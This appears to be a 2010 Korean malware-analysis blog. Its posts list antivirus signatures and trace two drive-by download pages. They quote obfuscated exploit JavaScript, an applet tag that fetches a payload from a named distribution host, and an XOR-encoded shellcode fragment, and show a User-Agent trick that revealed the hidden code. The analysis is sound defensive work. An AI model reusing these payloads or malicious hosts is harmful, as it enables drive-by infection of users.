posted by Kwan's 2010. 5. 11. 22:35

V3 엔진 업데이트            Copyright ⓒ, (주)안철수연구소, 1988-2010, All rights reserved.

 *  엔진버전: 2010.05.11.04

 1. 다음 악성 코드의 진단/치료 엔진을 업데이트했습니다.

    Dropper/Malware.126444.E
    Win-Trojan/Antisb.734720
    Dropper/Malware.127488.N
    Win-Trojan/Vilsel.44544.G
    Dropper/Malware.19496.I
    Win-Trojan/Antisb.282624.DU
    Dropper/Malware.126439.E
    Dropper/Malware.18472.E
    Dropper/Malware.126442.G
    Win-Trojan/Antisb.378880
    Dropper/Malware.126450.B
    Dropper/Malware.126453
    Dropper/Malware.127577
    Win-Trojan/Tofsee.207367
    Dropper/Malware.126468.D
    Win-Trojan/Injector.159744.L
    Win-Trojan/Antisb.238080.C
    Win-Trojan/Antisb.154112.K
    Dropper/Malware.699592
    Win32/Harebot.worm.30720
    Win-Trojan/Malware.532992.C
    Dropper/Malware.139264.AK
    Win-Trojan/Antisb.88090
    Win32/Harebot.worm.27136
    Win-Trojan/Fakeav.87552.Q
    Win-Trojan/Downloader.133632.L
    Dropper/Malware.25088.S
    Dropper/Malware.53248.BT
    Dropper/Malware.833024.C
    Win-Trojan/Antisb.118925.B
    Win-Trojan/Dabvegi.962560.C
    Win-Trojan/Dabvegi.958464.B
    Win-Trojan/Fakeav.87552.R
    Win32/Harebot.worm.43008.B
    Dropper/Malware.102400.AT
    Dropper/Malware.810856
    Dropper/Malware.28672.FJ
    Dropper/Malware.44420
    Dropper/Malware.61440.DP
    Win-Trojan/Malware.60416.W
    Dropper/Malware.397824.M
    Win-Trojan/Hupigon.295936.CT
    Dropper/Malware.197535
    Dropper/Malware.373415
    Win-Trojan/Malware.569344.E
    Dropper/Malware.19538
    Dropper/Malware.368849
    Dropper/Malware.451182
    Win-Trojan/Fakealert.148480.T
    Dropper/Malware.421376.G
    Win-Trojan/Malware.451584.D
    Win-Trojan/Malware.145408.U
    Dropper/Malware.86709
    Dropper/Malware.19538.B
    Dropper/Malware.760320.F
    Dropper/Malware.164818
    Win32/Koobface.worm.49152.GU
    Win32/Koobface.worm.49152.GV
    Win-Trojan/Zbot.432128
    Dropper/Malware.220641
    Win32/Korlab.worm.166704.D
    Win-Trojan/Changeup.69632.CH
    Win-Trojan/Changeup.69632.CI
    Dropper/Malware.41064
    Dropper/Malware.45005
    Dropper/Malware.189030.E
    Dropper/Malware.200520.B
    Dropper/Malware.30208.DK
    Dropper/Malware.364544.T
    Dropper/Malware.1583550
    Win-Trojan/Waldac.416768.B
    Win-Trojan/Fakeav.104960.AA
    Dropper/Pwstealer.106580
    Dropper/Pwstealer.109500
    Dropper/Pwstealer.106580.B
    Win-Trojan/Pwstealer.65904
    Win-Trojan/Pwstealer.65904.B
    Win-Trojan/Agent.54020.B
    Dropper/Agent.105120
    Win-Trojan/Agent.100740
    Win-Trojan/Psw.61824
    Dropper/Malware.1839692
    Dropper/Malware.49152.FB
    Dropper/Malware.152326
    Dropper/Malware.29313.B
    Dropper/Malware.28270
    Win-Trojan/Inject.24576.CF
    Win-Trojan/Downloader.71480
    Win-Trojan/Fakerean.159232
    Win-Trojan/Tofsee.16384.F
    Win32/Autorun.worm.88576.K
    Win-Trojan/Fakealert.167936.M
    Win-Trojan/Bredolab.69120

 2. 다음 악성 코드의 진단명을 수정했습니다.

댓글을 달아 주세요

posted by Kwan's 2010. 5. 11. 22:29

우연히 구글링을 하던중 www.rendom.mx/bst/ 를 발견하였다.
이사이트는 익스플로릿을 배포하는것으로 알려져있다.
멀질라로 통해 처음에 봤을때는 코드형태가 매우 이상했다.

 var wR39n2OWQBsOq7 ='';

wR39n2OWQBsOq7 = 'so un ds25so un ds30so un ds41so un ds76so un ds61so u\
n ds72so un ds25so un ds32so un ds30so un ds59so un ds\

이런식으로 계속 반복이 되는 코드를 보았다.
난 바로 도움을 청했다. 이런것을 볼때는 어떻게 보아야하는지 물어보았다. 첨에는 멀질라로의 한계같았지만 약간의 설정만 변경하면 최종파일까지 보일수 있다는걸 알았다.

처음 멀질라 설정값은
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

이런식으로 되어있다 하지만 이렇게 본다면 나와같이 이게 뭐니 하고 의문을 가질것이다. 하지만 User Agent 를 통하여 설정을
Mozilla/7.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.2)  Gecko/20010726 Netscape/7.0

이쪽으로 설정을 변경한다면

 <applet code="sklif.Hieeyfc.class" archive="j1_893d.jar" width="480" height="200">
 <param name="data" VALUE="
http://www.rendom.mx/bst/load.php?spl=javal">
 <param name="cc" value="1">
 </applet>

이런식으로 최종파일을 쉽게 찾을수 있다. 결론적으로 멀질라의 간단한 특성을 이해하고 있다면 쉽게 찾을수 있다는 것이었다.
이걸 찾기까지 많은 시간을 내주신 바이쭌님과 처리님께 마지막으로 감사를 드립니다!ㅎ

검사 파일: load.php 전송 시각: 2010.05.11 04:24:06 (UTC)

 a-squared 4.5.0.50
2010.05.10 Packed.Win32.Krap!IK

AhnLab-V3 2010.05.11.00
2010.05.10 Packed/Win32.Krap

AntiVir 8.2.1.236
2010.05.10 TR/Crypt.XPACK.Gen

 Antiy-AVL 2.0.3.7
2010.05.10 Packed/Win32.Krap.gen

Avast 4.8.1351.0
2010.05.10 Win32:Trojan-gen

Avast5 5.0.332.0
2010.05.10 Win32:Trojan-gen

AVG 9.0.0.787
2010.05.11 Generic17.BUNU

BitDefender   7.2
2010.05.11 Backdoor.Bot.121242

Comodo 4821
2010.05.11 TrojWare.Win32.Trojan.Agent.Gen

F-Secure 9.0.15370.0
2010.05.11 Backdoor.Bot.121242

GData 21
2010.05.11 Backdoor.Bot.121242

Ikarus T3.1.1.84.0
2010.05.11 Packed.Win32.Krap

Kaspersky 7.0.0.125
2010.05.11 Packed.Win32.Krap.gx

McAfee-GW-Edition
2010.1 2010.05.10 Artemis!7B7D3BC35365

Microsoft 1.5703
2010.05.11 PWS:Win32/Zbot.gen!Y

NOD32 5103
2010.05.10 a variant of Win32/Kryptik.EBW

nProtect 2010-05-10.01
2010.05.10 Backdoor.Bot.121242

Panda 10.0.2.7
2010.05.10 Suspicious file

Sophos 4.53.0
2010.05.11 Mal/Zbot-U

Sunbelt 6289
2010.05.11 Trojan.Win32.Generic!BT

TrendMicro 9.120.0.1004
2010.05.11 TSPY_QAKBOT.SMG

TrendMicro-HouseCall 9.120.0.1004
2010.05.11 TSPY_QAKBOT.SMG

 마지막으로 모든 샘플은 안철수연구소 , 이스트소프트

전송합니다!

댓글을 달아 주세요

posted by Kwan's 2010. 5. 11. 22:25

주전자 닷컴 사이트 플레시 게임란에 어제 악성코드 유포하는것을 보았다.
플레시 게임을 시작 버튼에 숨겨져 있는것으로 현재는 유포하는지 모르겠다.
그 페이지 안에는 http://211.234.118.207/main.html 이라는것이 숨겨져있다 물론 악성코드이다.
일반 익스플로러로 켠다면 절대 보이지 않을것이다. main.html 을 자세히 열어보면
<SCRIPT LANGUAGE="JavaScript"> <!-- Hide 라는 표시 때문에 일반 익스플로러는 내부를 보지 못한다.


이 그림에서와 같이 main.html은

</SCRIPT>
<script src="rl.jpg"></script>
<script src="yt1.jpg"></script>
<script src="ytl.jpg"></script>

이것의 공유지임을 알수있다. 이 3파일중 하나는 분명 최종파일 exe 를 유포할껄 직감을 했다. 좀더 나는 안쪽으로 들어가서
rl.jpg ~ ytl.jpg 까지 살펴보았다. 처음에는 rl.jpg 에서 유포하는것으로 알고있었지만 코드가 해석 되지 못했다. 그러므로 패쓰하고
yt1.jpg로 넘어갔다.
yt1.jpg를 살펴보니 !!

try
 {
   new ActiveXObject("kYTx");
 }
 catch (e)
 {
   var YTMTV="%ud5db%uc9c9%u87cd%u9292%uc8d7%udad3%ud2da%udcd0%ud4d3%u93dc%ud8d3%udbdb%uded4%ud8d4%uc9d3%ude93%u93d2%ucfd6%uc992%uced8%u93c9%uc5d8%uBDd8%uBD";
   var YTavp123="%u58yutianayt58%u58yutianayt58%u10yutianaytEB%u4Byutianayt5B%uC9yutianayt33%uB9yutianayt66%u03yutianaytB8%u34yutianayt80%uBDyutianayt0B%uFAE2%u05yutianaytEB%uEByutianaytE8%uFFyutianaytFF";
   var YTavp1=(YTavp123.r-place(/yutianayt/g,""));
 }

이런 코드를 볼수있다. 여기서 나는 약간의 도움을 청했다. 막막했기 때문이다. 네이트온으로 도움을 부탁 드린 후 다시 코드 해석을 해보았다.
잡다한 코드 빼놓고는 중요코드는

var YTMTV="%ud5db%uc9c9%u87cd%u9292%uc8d7%udad3%ud2da%udcd0%ud4d3%u93dc%ud8d3%udbdb%uded4%ud8d4%uc9d3%ude93%u93d2%ucfd6%uc992%uced8%u93c9%uc5d8%uBDd8%uBD 이것이었다.

Hex 를 하니 이런 값이 보였다.

dbd5c9c9cd879292d7c8d3dadad2d0dcd3d4dc93d3d8dbdbd4ded4d8d3c993ded293d6cf92c9d8cec993d8c5d8BDBD 

이코드는 어디서 많이 봤던거 같다. 예전에 유포됐던 파일의 값 과 매우 유사하다!
이값을 다시 paste as hex 로 붙여 검색을 해보니 역시 xor 값은bd 였다.

이 그림과 같이 최종파일이 나오는걸 볼수있다.
처음에는 많이 당황했었지만 한번더 생각해보고 푼다면 쉽게 풀릴수있던것이다!

댓글을 달아 주세요

  1. 121312214121 2013.06.28 18:37  Addr  Edit/Del  Reply

    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.zuzunza.com%2Ffg%2Fimg%2Fgreen%2Fmid_top_btn01_on.gif&client=googlechrome&hl=ko
    구글 에서 주전자닷컴 진단했더니 이렇게 떳다네여